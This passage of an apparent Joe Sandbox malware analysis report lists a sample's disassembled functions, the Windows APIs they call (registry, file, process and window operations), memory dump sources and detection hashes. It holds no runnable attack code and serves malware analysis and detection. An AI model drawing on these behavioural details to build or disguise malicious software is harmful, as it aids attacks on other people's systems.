                                        • FreeLibrary.KERNEL32(00000000,?,?,007354C3,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6329
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-1355242751
                                        • Opcode ID: c5d7297944e9ab7c582ccfb8853b10440d01ac805d28692630f34548c344476f
                                        • Instruction ID: 4d093602ccf3e6bb55cc2e3f6d6b6a58d373fa360f95a4ac4ec9171c9132bcab
                                        • Opcode Fuzzy Hash: c5d7297944e9ab7c582ccfb8853b10440d01ac805d28692630f34548c344476f
                                        • Instruction Fuzzy Hash: ECD01236A829296742322726FC1CADE7F17DE85F213964015F900A22A8CF68CD0187E4
                                        Function 0077ACE6 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 0077AD86
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0077AD94
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0077ADC7
                                        • CloseHandle.KERNEL32(?), ref: 0077AF9C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                        • String ID:
                                        • API String ID: 3488606520-0
                                        • Opcode ID: de8eb4c6a97cb1662e2528c7fc3713b0a05550cab7e3724032b1e7ca412e483c
                                        • Instruction ID: 74f7d09db3ec8e96fadc2bd42fc56ef9c51dffcfe572a1bb01d6777601945357
                                        • Opcode Fuzzy Hash: de8eb4c6a97cb1662e2528c7fc3713b0a05550cab7e3724032b1e7ca412e483c
                                        • Instruction Fuzzy Hash: 4FA190B1604301AFE720DF28C896B2AB7E5AF84710F14885DF559DB2D2DB75EC40CB96
                                        Function 0077C328 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 0077D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C00D,?,?), ref: 0077D314
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D350
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3C7
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3FD
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C404
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0077C45F
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0077C4C2
                                        • RegCloseKey.ADVAPI32(?,?), ref: 0077C505
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077C512
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 826366716-0
                                        • Opcode ID: d3ab224efcb7f81e77a45553659b1dbc1d928a0f6794a436c1b49430ce4a2646
                                        • Instruction ID: d6fd2d97b7158fbe724ade07a82a35c7b5c395b8a62f11189a6aad63b8cadbb1
                                        • Opcode Fuzzy Hash: d3ab224efcb7f81e77a45553659b1dbc1d928a0f6794a436c1b49430ce4a2646
                                        • Instruction Fuzzy Hash: AE61BF31108245AFDB15DF24C894E3ABBE5FF88348F14849CF5598B2A2DB35ED45CB92
                                        Function 0075EC27 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0075E60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0075D6E2,?), ref: 0075E629
                                          • Part of subcall function 0075E60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0075D6E2,?), ref: 0075E642
                                          • Part of subcall function 0075E9C5: GetFileAttributesW.KERNELBASE(?,0075D755), ref: 0075E9C6
                                        • lstrcmpiW.KERNEL32(?,?), ref: 0075EC9F
                                        • MoveFileW.KERNEL32(?,?), ref: 0075ECD8
                                        • _wcslen.LIBCMT ref: 0075EE17
                                        • _wcslen.LIBCMT ref: 0075EE2F
                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0075EE7C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                        • String ID:
                                        • API String ID: 3183298772-0
                                        • Opcode ID: 15bcea0cc46c35855afb983927cdb5b73a4822583bead9cc7d0492dab7a9d0d3
                                        • Instruction ID: c03d0e257aed19c13fc0a12b131cc47a72ee19f2dc34ae3766bd93c0731f13f6
                                        • Opcode Fuzzy Hash: 15bcea0cc46c35855afb983927cdb5b73a4822583bead9cc7d0492dab7a9d0d3
                                        • Instruction Fuzzy Hash: 395186B24083859BD774EB54C8859DB73EDAF84351F00092EF689D3191EF78E68C876A
                                        Function 007223E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: de0d147576fcca177f89b118ef52de94fc2acdd9e38e56bc8d3db2902bfe3865
                                        • Instruction ID: f9d78dfa9607916194edaabda743bdbc536b95765d55653b29c93e90d624f3fa
                                        • Opcode Fuzzy Hash: de0d147576fcca177f89b118ef52de94fc2acdd9e38e56bc8d3db2902bfe3865
                                        • Instruction Fuzzy Hash: B441E672A00214EFCB20DF78D884A5DB3E5EF84714F158199E515EB392EB39ED42CB80
                                        Function 007641CE Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetInputState.USER32 ref: 00764225
                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 0076427C
                                        • TranslateMessage.USER32(?), ref: 007642A5
                                        • DispatchMessageW.USER32(?), ref: 007642AF
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007642C0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                        • String ID:
                                        • API String ID: 2256411358-0
                                        • Opcode ID: c5c1d0e6ab17c2dc84b47adfbec960c9885f0ac546d837b59ae7f86ffc2a7248
                                        • Instruction ID: 69589f807b0146b29852b4441a9bad1b11289f20aa302eb3cb5ab56661a83c09
                                        • Opcode Fuzzy Hash: c5c1d0e6ab17c2dc84b47adfbec960c9885f0ac546d837b59ae7f86ffc2a7248
                                        • Instruction Fuzzy Hash: A431C2705002429EEB35CB65D818FB73BE8BB15304F24456DEC63D21A1D67C9889CB29
                                        Function 00752191 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 007521A5
                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 00752251
                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 00752259
                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 0075226A
                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00752272
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: 8e0edee32ad58600b67384d279e4e0303b53f90312db6695f2be75ad64e0555d
                                        • Instruction ID: 64a1820bd148d9ee6bc60956ea443322eb3b446f117237e59d7198bdad1db71a
                                        • Opcode Fuzzy Hash: 8e0edee32ad58600b67384d279e4e0303b53f90312db6695f2be75ad64e0555d
                                        • Instruction Fuzzy Hash: 4631AD75A00219EFDB14CFA8CD88ADE3BB5FB15315F118225FE21A72D1C7B4AD458B90
                                        Function 00786065 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007860A4
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 007860FC
                                        • _wcslen.LIBCMT ref: 0078610E
                                        • _wcslen.LIBCMT ref: 00786119
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00786175
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen
                                        • String ID:
                                        • API String ID: 763830540-0
                                        • Opcode ID: d4897b404d2541f9288e8ad2d2232fdab2bd23a2edcdb18f67ba00aabe7252c2
                                        • Instruction ID: 0a32bf0bff344f64ef6a4d3e1b5b4b1c183ccca8d1b75a5284a6134f8b97d3d9
                                        • Opcode Fuzzy Hash: d4897b404d2541f9288e8ad2d2232fdab2bd23a2edcdb18f67ba00aabe7252c2
                                        • Instruction Fuzzy Hash: 6F217571940218ABDB21AF94CC88EDE77B8FB04364F108156F915DA1C5D77889858F60
                                        Function 0075089E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,007507D1,80070057,?,?,?,00750BEE), ref: 007508BB
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007507D1,80070057,?,?), ref: 007508D6
                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007507D1,80070057,?,?), ref: 007508E4
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007507D1,80070057,?), ref: 007508F4
                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007507D1,80070057,?,?), ref: 00750900
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: 2afc2528135ebb59a99b1075aa02dc63fd1db835c4d9e2490c255340198fe3df
                                        • Instruction ID: 1c7f47570b7c5dd247edc5d2c7c2b004aa9685a931fa55aed479e4bfca42c646
                                        • Opcode Fuzzy Hash: 2afc2528135ebb59a99b1075aa02dc63fd1db835c4d9e2490c255340198fe3df
                                        • Instruction Fuzzy Hash: AC018F72600208AFDB205F64DC08FDA7BBDEB48762F248024FD05D2251E7B8ED049BE0
                                        Function 00760BCB Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760BE0
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760BED
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760BFA
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760C07
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760C14
                                        • CloseHandle.KERNEL32(?,?,?,?,00760A39,?,00763C56,?,00000001,00733ACE,?), ref: 00760C21
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 21fd71747e4ec717569572f23ba8fb3659f2b57ec2204fd5e44a280b16c989a7
                                        • Instruction ID: 61d6abc732985b772be163bd63fa5feb5a1263422ef1d5cd0f9ecacdc9086863
                                        • Opcode Fuzzy Hash: 21fd71747e4ec717569572f23ba8fb3659f2b57ec2204fd5e44a280b16c989a7
                                        • Instruction Fuzzy Hash: 2F01DCB1800B16CFCB30AF66D880803FBF9EF503093158A3ED09742921C7B5A888CF90
                                        Function 007564D3 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 007564E7
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 007564FE
                                        • MessageBeep.USER32(00000000), ref: 00756516
                                        • KillTimer.USER32(?,0000040A), ref: 00756532
                                        • EndDialog.USER32(?,00000001), ref: 0075654C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: a77e9b85c65ab5c5cde917244a22a0102248b934566dd6f83767fc8eea63ee65
                                        • Instruction ID: f9dcf7214690cf963123bfe56788f04e3a4c487e970cdda62a3327f91a47a74b
                                        • Opcode Fuzzy Hash: a77e9b85c65ab5c5cde917244a22a0102248b934566dd6f83767fc8eea63ee65
                                        • Instruction Fuzzy Hash: D1018670680708ABEB305B10DD4EBD677B8BF10706F404569B587620E5FBF8AE58CB94
                                        Function 00722630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0072264E
                                          • Part of subcall function 00722D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0072DB71,007C1DC4,00000000,007C1DC4,00000000,?,0072DB98,007C1DC4,00000007,007C1DC4,?,0072DF95,007C1DC4), ref: 00722D6E
                                          • Part of subcall function 00722D58: GetLastError.KERNEL32(007C1DC4,?,0072DB71,007C1DC4,00000000,007C1DC4,00000000,?,0072DB98,007C1DC4,00000007,007C1DC4,?,0072DF95,007C1DC4,007C1DC4), ref: 00722D80
                                        • _free.LIBCMT ref: 00722660
                                        • _free.LIBCMT ref: 00722673
                                        • _free.LIBCMT ref: 00722684
                                        • _free.LIBCMT ref: 00722695
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 175c3ef8178a805d802522bd4bd1eb13fd8e7cd09ce5b913d94afa74d5c62485
                                        • Instruction ID: 2cbad591e5e224a673473ac807da706d8f186c81cc0d6583d8063d5b12207da8
                                        • Opcode Fuzzy Hash: 175c3ef8178a805d802522bd4bd1eb13fd8e7cd09ce5b913d94afa74d5c62485
                                        • Instruction Fuzzy Hash: 24F0DA71942230EB8711AF54BC09D483B64FF19752386C62EF41496277DB7D8963AF8C
                                        Function 00776B2D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007105D2: EnterCriticalSection.KERNEL32(007C170C,?,00000000,?,006FD1DA,007C3540,00000001,00000000,?,?,0076EF39,?,?,00000000,00000001,?), ref: 007105DD
                                          • Part of subcall function 007105D2: LeaveCriticalSection.KERNEL32(007C170C,?,006FD1DA,007C3540,00000001,00000000,?,?,0076EF39,?,?,00000000,00000001,?,00000001,007C2430), ref: 0071061A
                                          • Part of subcall function 00710433: __onexit.LIBCMT ref: 00710439
                                        • __Init_thread_footer.LIBCMT ref: 00776B95
                                          • Part of subcall function 00710588: EnterCriticalSection.KERNEL32(007C170C,00000000,?,006FD208,007C3540,007327E9,00000001,00000000,?,?,0076EF39,?,?,00000000,00000001,?), ref: 00710592
                                          • Part of subcall function 00710588: LeaveCriticalSection.KERNEL32(007C170C,?,006FD208,007C3540,007327E9,00000001,00000000,?,?,0076EF39,?,?,00000000,00000001,?,00000001), ref: 007105C5
                                          • Part of subcall function 00763EF6: LoadStringW.USER32(00000066,?,00000FFF,0078DCEC), ref: 00763F3E
                                          • Part of subcall function 00763EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 00763F64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                        • String ID: x3|$x3|$x3|
                                        • API String ID: 1072379062-2116605995
                                        • Opcode ID: b517f581639498827955f125324a81d44d2b7f65ec8a1e210635903a3201559e
                                        • Instruction ID: 9933b1f1364be57e2d17ed4f8c64293dd1987ff2b29a6f9aa3c2aea545bbe818
                                        • Opcode Fuzzy Hash: b517f581639498827955f125324a81d44d2b7f65ec8a1e210635903a3201559e
                                        • Instruction Fuzzy Hash: 29C18A75A00109EFCF14DF58C895EBAB7B9FF48340F148029E909AB295DB78AD45CBA0
                                        Function 0075CA3D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0075CAC6
                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0075CB0C
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007C2990,00D75C98), ref: 0075CB55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem
                                        • String ID: 0
                                        • API String ID: 135850232-4108050209
                                        • Opcode ID: 859615fd0efae533aad3cf80f25426407c6d397f6915e58b679285eff058eb5f
                                        • Instruction ID: 3bb9e52edf19fec99ea39cac96f14d085efa8f235074860705c6467c6df3d3c1
                                        • Opcode Fuzzy Hash: 859615fd0efae533aad3cf80f25426407c6d397f6915e58b679285eff058eb5f
                                        • Instruction Fuzzy Hash: 0841C3706053419FD721DF24C886F9ABBE5AF84321F10461DFD61972D1D7B8E908CBA2
                                        Function 00784D75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0078DCD0,00000000,?,?,?,?), ref: 00784E09
                                        • GetWindowLongW.USER32 ref: 00784E26
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00784E36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
